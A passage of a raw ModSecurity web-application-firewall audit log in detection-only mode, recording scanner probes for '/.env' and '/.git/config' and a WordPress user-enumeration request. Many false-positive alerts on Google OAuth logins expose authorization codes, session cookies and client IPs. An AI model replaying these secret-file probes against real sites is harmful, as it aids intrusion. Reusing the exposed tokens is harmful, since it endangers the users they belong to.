"jinansystem.com"] [uri "/faculty/onlineClasses.php"] [unique_id "aIHvwVooLYw4or2LgWKZAAAAANc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753345985699300 5400165 (- - -) Stopwatch2: 1753345985699300 5400165; combined=7370, p1=774, p2=6251, p3=121, p4=101, p5=123, sr=231, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c50aa2b-Z-- --fcfb260b-A-- [24/Jul/2025:11:34:55.631126 +0300] aIHwL0dutIOpb_kg22jKxAAAAAQ 4.251.127.96 43972 127.0.0.1 7081 --fcfb260b-B-- GET /.env HTTP/1.0 Host: www.sys.ellaith.com X-Real-IP: 4.251.127.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br --fcfb260b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=acfaf0d885f2e7cf46af72dd1a8c806e; expires=Thu, 24 Jul 2025 09:35:55 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --fcfb260b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sys.ellaith.com"] [uri "/.env"] [unique_id "aIHwL0dutIOpb_kg22jKxAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753346095567952 63286 (- - -) Stopwatch2: 1753346095567952 63286; combined=2770, p1=782, p2=1871, p3=0, p4=0, p5=117, sr=181, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fcfb260b-Z-- --c9ac3d77-A-- [24/Jul/2025:11:36:03.897318 +0300] aIHwc1ooLYw4or2LgWKcwQAAAMo 213.136.84.241 44068 127.0.0.1 7081 --c9ac3d77-B-- GET /.git/config HTTP/1.0 Host: first-builders.com X-Real-IP: 213.136.84.241 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --c9ac3d77-F-- HTTP/1.1 503 Service Unavailable X-Powered-By: PHP/8.3.23 Retry-After: 600 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=utf-8 --c9ac3d77-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "first-builders.com"] [uri "/.git/config"] [unique_id "aIHwc1ooLYw4or2LgWKcwQAAAMo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/first-builders.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753346163879761 17697 (- - -) Stopwatch2: 1753346163879761 17697; combined=2500, p1=553, p2=1834, p3=0, p4=0, p5=112, sr=152, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c9ac3d77-Z-- --7825e867-A-- [24/Jul/2025:11:39:24.075907 +0300] aIHxOxukk8cgt8UnU9pzOQAAAEs 212.28.242.186 58042 127.0.0.1 7081 --7825e867-B-- GET /administration/index.php?code=4/0AVMBsJiNW38XSuFN3DKjl29dlLmHHmQB4k0Pr5CKDjuSS66h1BRwfZDyqGdejg3pIP77YQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i cookie: PHPSESSID=n1bge5fhsbkvhbirek697od403 --7825e867-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --7825e867-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHxOxukk8cgt8UnU9pzOQAAAEs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753346363658828 417282 (- - -) Stopwatch2: 1753346363658828 417282; combined=4203, p1=500, p2=3380, p3=108, p4=56, p5=159, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7825e867-Z-- --cc56da73-A-- [24/Jul/2025:11:39:45.899194 +0300] aIHxTxukk8cgt8UnU9pzWwAAAFI 13.223.52.33 33016 127.0.0.1 7081 --cc56da73-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: glamilea.com X-Real-IP: 13.223.52.33 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: yay_currency_widget=29035 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --cc56da73-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.33 X-Robots-Tag: noindex Link: <https://glamilea.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Upgrade: h2,h2c Connection: Upgrade, close Content-Type: application/json; charset=UTF-8 --cc56da73-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||glamilea.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||glamilea.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "glamilea.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aIHxTxukk8cgt8UnU9pzWwAAAFI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/glamilea.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753346383588850 2310461 (- - -) Stopwatch2: 1753346383588850 2310461; combined=3085, p1=581, p2=2371, p3=0, p4=0, p5=133, sr=194, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cc56da73-Z-- --7676e342-A-- [24/Jul/2025:11:41:55.981333 +0300] aIHx0xukk8cgt8UnU9p0xAAAAEk 178.135.16.151 34106 127.0.0.1 7081 --7676e342-B-- GET /faculty/onlineClasses.php?code=4/0AY0e-g6UYiolN9ouiBgWdROOnecNqUGUTmFUo0ouT4e-6JPF77KUlWrjtCVbc0kftDmpQQ&scope=email%20profile%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/gmail.readonly%20https://www.googleapis.com/auth/calendar.readonly%20https://www.googleapis.com/auth/classroom.courses.readonly%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 178.135.16.151 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: none sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document accept-encoding: gzip, deflate, br, zstd accept-language: en-GB,en;q=0.9,ar-LB;q=0.8,ar;q=0.7,en-US;q=0.6 priority: u=0, i --7676e342-F-- HTTP/1.1 302 Moved Temporarily Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=hb9jph9646vfpoq3gh8283p1k2; path=/ Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.jinansystem.com/login.php Content-Type: text/html; charset=UTF-8 --7676e342-E-- --7676e342-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/gmail.readonly https:/www.googleapis.com/auth/calendar.readonly https:/www.googleapis.com/auth/classroom.courses.readonly https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/gmail.readonly https:/www.googleapis.com/auth/calendar.readonly https:/www.googleapis.com/auth/classroom.courses.readonly https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/faculty/onlineClasses.php"] [unique_id "aIHx0xukk8cgt8UnU9p0xAAAAEk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753346515969912 11585 (- - -) Stopwatch2: 1753346515969912 11585; combined=7738, p1=896, p2=6550, p3=107, p4=75, p5=109, sr=180, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7676e342-Z-- --42cca773-A-- [24/Jul/2025:11:49:17.837862 +0300] aIHzjVooLYw4or2LgWKwHQAAAMI 141.105.87.197 55114 127.0.0.1 7081 --42cca773-B-- GET /administration/index.php?code=4/0AVMBsJiCCoyeNn1B7R67nFIXkkCK7L3q2W0k8FOgj2wgJQgy2JeFW3Kt-8-JYF8baZdJ8Q&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=0cks2agr4hamlumcv2616npn63 --42cca773-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --42cca773-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHzjVooLYw4or2LgWKwHQAAAMI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753346957357828 480164 (- - -) Stopwatch2: 1753346957357828 480164; combined=7387, p1=545, p2=6513, p3=137, p4=63, p5=128, sr=162, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --42cca773-Z-- --fabd914f-A-- [24/Jul/2025:11:51:26.849492 +0300] aIH0Dhukk8cgt8UnU9p6aQAAAFQ 212.28.242.186 56392 127.0.0.1 7081 --fabd914f-B-- GET /administration/index.php?code=4/0AVMBsJgyBhDX5sZpyjbL7gciqCKkW4cMFHEs87RQSbjYO0sG5UVMNgTrxVdv2CLrU8wLfg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=i5fcc9286nhc2a08o9eamm2nr7 --fabd914f-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --fabd914f-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH0Dhukk8cgt8UnU9p6aQAAAFQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753347086354914 494750 (- - -) Stopwatch2: 1753347086354914 494750; combined=5883, p1=534, p2=4994, p3=116, p4=115, p5=123, sr=140, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fabd914f-Z-- --fd8b1529-A-- [24/Jul/2025:11:52:27.268943 +0300] aIH0S1ooLYw4or2LgWK0uAAAAMo 159.203.45.59 51876 127.0.0.1 7080 --fd8b1529-B-- GET /.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 159.203.45.59 Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --fd8b1529-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd8b1529-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/.env"] [unique_id "aIH0S1ooLYw4or2LgWK0uAAAAMo"] Stopwatch: 1753347147264336 4680 (- - -) Stopwatch2: 1753347147264336 4680; combined=2853, p1=637, p2=2072, p3=23, p4=31, p5=90, sr=170, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fd8b1529-Z-- --ac97f87d-A-- [24/Jul/2025:11:52:27.565916 +0300] aIH0Sxukk8cgt8UnU9p7YQAAAEw 159.203.45.59 51878 127.0.0.1 7080 --ac97f87d-B-- GET /.git/config HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 159.203.45.59 Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --ac97f87d-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac97f87d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/.git/config"] [unique_id "aIH0Sxukk8cgt8UnU9p7YQAAAEw"] Stopwatch: 1753347147559697 6320 (- - -) Stopwatch2: 1753347147559697 6320; combined=3838, p1=807, p2=2822, p3=38, p4=51, p5=119, sr=249, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ac97f87d-Z-- --b72cad5c-A-- [24/Jul/2025:11:53:43.038526 +0300] aIH0lhukk8cgt8UnU9p7swAAAFQ 141.105.87.197 42998 127.0.0.1 7081 --b72cad5c-B-- GET /administration/index.php?code=4/0AVMBsJjPtC90HtCziBBkKQh_gyZRyih2CExBuOxNOC5yv1oKJLpTSutEilJLL5lvjuRCng&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=j2bk392enphs45gl28iu9fht71 --b72cad5c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --b72cad5c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH0lhukk8cgt8UnU9p7swAAAFQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753347222565718 473115 (- - -) Stopwatch2: 1753347222565718 473115; combined=5250, p1=566, p2=3722, p3=125, p4=627, p5=209, sr=140, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b72cad5c-Z-- --2569ab2f-A-- [24/Jul/2025:12:06:40.751764 +0300] aIH3oFooLYw4or2LgWLGbgAAAME 212.28.242.188 43892 127.0.0.1 7081 --2569ab2f-B-- GET 